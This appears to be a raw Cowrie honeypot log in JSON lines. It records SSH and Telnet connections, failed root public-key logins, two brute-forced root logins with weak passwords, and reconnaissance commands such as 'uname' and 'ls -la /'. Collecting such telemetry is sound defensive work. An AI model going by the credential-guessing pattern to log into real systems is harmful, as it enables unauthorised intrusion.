{"eventid":"cowrie.login.failed","username":"root","fingerprint":"5c:45:e7:63:ce:fe:93:51:65:22:a2:1a:51:76:0e:1a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDevQyCt06VKbdFcD680JVyiFncqdLKD9/oepOO8uwrSl2+feESHRtXEVFKzm8ew5722I8ap8uxjf3DmVvdvVgv1FSToxY3QREPRcxvSyve3Vj74E8cTeYVhfVeYxUf3e0XXofo/c5xvkpK34OxO5bqteZLTBc5bZaIL1mwgmU/tl5yK5Ut6BfupCicYLxGZOMy/qpNIaJn/64gLW3sHI4ZLwqa6RU7rD56lUroxQAJ7Ysf2aAUSFxtG35+qvt3N/NwXiq8RNPURuRj+M6PYnng0dHyD629ytH5kxCM2DKRxLDPEnMociRRN2Hhs/8MN37U9N3hgmf5fUb7osvUdBcus+r6Vxn22eQo5Bgp+8APDDDoDauTNOIU/AOkphJkMEfJYgeunAnfZbnMwOqVJF5yvkzjqF6v05jWL4hAvY+dpjsrtihOT+UV/MyFE6KcN87ZQNJPCBCiWxKZqycO0tTmqn1pGmza7UEi+VBmt9SNq+z8ULHa9L+wL9SKtdIO5TTPeNXAyyb9mDQNoNiS2rJPNqLV6BIbepwlmqq8ME9IC3TVQVOo4TwQv2Ioujra1VIxf18wUBhNG1zDjEd5q59TVJ/rP7H6bIjbDZ/YgGKPYZGAOdHhDGUmfLToxbWbCwbPKwJYJzZfUiNEVsxIBW1BvhjgvLM4g/okjkMTzEZ9Zw==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.003142Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.045593Z","src_ip":"212.227.125.160","session":"755812868a10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42906,"dst_ip":"1.2.3.4","dst_port":22,"session":"fea173ae5075","protocol":"ssh","message":"New connection: 212.227.125.160:42906 (1.2.3.4:22) [session: fea173ae5075]","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.087016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.088604Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.130384Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.217444Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.218110Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.261058Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"04:c0:35:85:ac:f9:1c:5a:29:58:24:02:02:a7:df:5a","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQChAjXWlIn5pt61Mx6rDh+hGvVdnSQzgMH5cDACHtr3hnvwxEU9M3ZkpRBcrDpFMMuanVnWqJUJdIOSL/d+ojjspbdGG7Ei+zVLXDxU0Aw9lHCsUrlAkPivxU3vjrBwq2Xc2JxBsaxuVuW7bPxiCXkEQDwn2AfIekt+mDSGwu2v3ymCZB42DlZi++Tim7mEp8HjxFvAMvqiC/xD5Lclt83LQxcHCVcYAWSvFk7odlSaMI7ib1mNUhWs5kSZX8DHtDwZ5jxYPL7fiO6VIUC8ydYJifY1wHzBZV42uXpyZ02Kxt1+q8Gy55UToc3yk8uQlinlDDXGTi65iM2qc4ZAVuZEb569EhgYEFjtqDQ56LdxD4azpt7+gEOEt7cRqN5dEbKmd22P/832KiZXOjl5h/9LH+et7u2TYgqD5vz9qOq+chsLUK6R0MgjcgyVT3NBZv0URH9O4os0vxXkL/BElsws2+6XmhhKc5ap2pWHUFev6/pMWSGZaoZrreEquRvxnHSnv/wc5fL2GwN7Wcvk4+3M323+/eZmck8Q6hrDNUed+evnoO/QcXQM2qO3vcb0yWx/5Zx4wsEqn9XTZOp38fStWpPJSJVazOoTaqZc56VVqgtOGJFt0bYOD6uKTBmSmhx8ivNw/Fr4GQ2tDSOCLvkruS1w/a4MW0HP9ISChKwf8w==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.261679Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.304766Z","src_ip":"212.227.125.160","session":"fea173ae5075"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42912,"dst_ip":"1.2.3.4","dst_port":22,"session":"112c392f60b9","protocol":"ssh","message":"New connection: 212.227.125.160:42912 (1.2.3.4:22) [session: 112c392f60b9]","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.346224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_8.9p19","message":"Remote SSH version: SSH-2.0-OpenSSH_8.9p19","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.347140Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.389472Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.482794Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"2d:13:51:5e:4b:e7:30:a6:9c:0b:42:4e:96:4c:05:fb","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCcPjOVNHzQQYmUsyG0fe4c9gQtdUQAmkvY29+0y6YWj4kmYTXWRfVEYFPLONSVZ+9BDGY9tBubE4eRrqO1eO+lR6GsOHhnKyXBJFIAd7vFDSK1kUtJfDcSpZNEnBo2579phREyJzOZ0uiwjGldtIiByJ1RtJ698hl7b3ERVG82DVyQj0og5BOlkmjyXmI3eWEONbH1DQH7vowZK150ZEOEPKuViB0z5T3Eg26ZMUgb/K2EPZLmhYREPk9a8l/tiYE/xFmjo33mRyOgM9+TAzV4GFjsdS25u2Q+38sFZ3uRDT89SkQoTzCKR+MFBEab5xsE36TIBd8+GsGSNLfOVWCMAwBxOKk70EdHUgwifQCF+9MaLhNOk/ZpVAc9j/npWsHOW2RlnOvI/mJ+YNBf7Xuo0M3bSZNYxQoelxl6b8mqauyrh0Vf+p9XuoBfPAI2dWNFfURMZXAQ4ksm7CXVi0U0S200Sim9U/GW7v5SbZRnAGaFeV4WH0uyo3nSiXx/XXM=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.483911Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.527672Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"e0:fb:a7:b0:b4:ac:75:3f:40:fa:da:02:31:c0:05:11","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDYxw2QaCCqrE/asq1hiw92YMDEq3idgtME5mq4qqE+p4+TY7Gk2ruAxDJ+XwAbS8W0XyipUArfn9vPTUikzU2yOw0aZnY0mDRS+CYslPSd1vniIt+U2oKZ7IE87a8PdK//TsD9oLVqvEtSWik8ObFVSOMhdJEstIZgNwVbh40MJBC/eEelVRf9pYQQgtoSEoMNOJMv1m+zukKose9wiJAqoh5ElO6yKWsv8KFDL2vmSUDIdOwS1bQMdcuhgQZ92Huiq3iYiXjpiQNJCo9F7/lcKdQNdAPVT7a2M1rF3Luxx2GNKTn4EntxXEBWsQM5PW/5a06PCsyhiCnCBEed78Ml","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.528483Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:57:40.573408Z","src_ip":"212.227.125.160","session":"112c392f60b9"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":56834,"dst_ip":"1.2.3.4","dst_port":22,"session":"374a13b73d86","protocol":"ssh","message":"New connection: 194.233.79.134:56834 (1.2.3.4:22) [session: 374a13b73d86]","sensor":"my-vps","timestamp":"2025-08-28T01:58:07.272657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:58:07.358720Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:58:07.680446Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:58:10.640617Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:58:11.476885Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T01:58:11.477596Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:12.023711Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:12.024681Z","src_ip":"194.233.79.134","session":"374a13b73d86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42104,"dst_ip":"1.2.3.4","dst_port":22,"session":"07a16cf812ee","protocol":"ssh","message":"New connection: 212.227.235.229:42104 (1.2.3.4:22) [session: 07a16cf812ee]","sensor":"my-vps","timestamp":"2025-08-28T01:58:19.077138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:58:19.153809Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T01:58:19.361843Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.login.success","username":"root","password":"081251****","message":"login attempt [root/081251****] succeeded","sensor":"my-vps","timestamp":"2025-08-28T01:58:20.452512Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T01:58:21.010155Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-28T01:58:21.010728Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:21.289329Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:21.290464Z","src_ip":"212.227.235.229","session":"07a16cf812ee"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.210.184","src_port":34744,"dst_ip":"1.2.3.4","dst_port":23,"session":"e719c2808994","protocol":"telnet","message":"New connection: 8.222.210.184:34744 (1.2.3.4:23) [session: e719c2808994]","sensor":"my-vps","timestamp":"2025-08-28T01:58:43.440816Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:57.572519Z","src_ip":"212.227.235.229","session":"b0cf03f2b2e1"}
{"eventid":"cowrie.session.closed","duration":180.30574297904968,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:58:57.580019Z","src_ip":"212.227.235.229","session":"b0cf03f2b2e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":11544,"dst_ip":"1.2.3.4","dst_port":23,"session":"910d522d50d5","protocol":"telnet","message":"New connection: 212.227.125.160:11544 (1.2.3.4:23) [session: 910d522d50d5]","sensor":"my-vps","timestamp":"2025-08-28T01:59:03.498881Z"}
{"eventid":"cowrie.session.closed","duration":30.676971197128296,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:59:14.117710Z","src_ip":"8.222.210.184","session":"e719c2808994"}
{"eventid":"cowrie.session.closed","duration":12.824387311935425,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T01:59:16.323165Z","src_ip":"212.227.125.160","session":"910d522d50d5"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":37516,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd7173b5614a","protocol":"ssh","message":"New connection: 194.233.79.134:37516 (1.2.3.4:22) [session: cd7173b5614a]","sensor":"my-vps","timestamp":"2025-08-28T01:59:45.536813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T01:59:45.537869Z","src_ip":"194.233.79.134","session":"cd7173b5614a"}
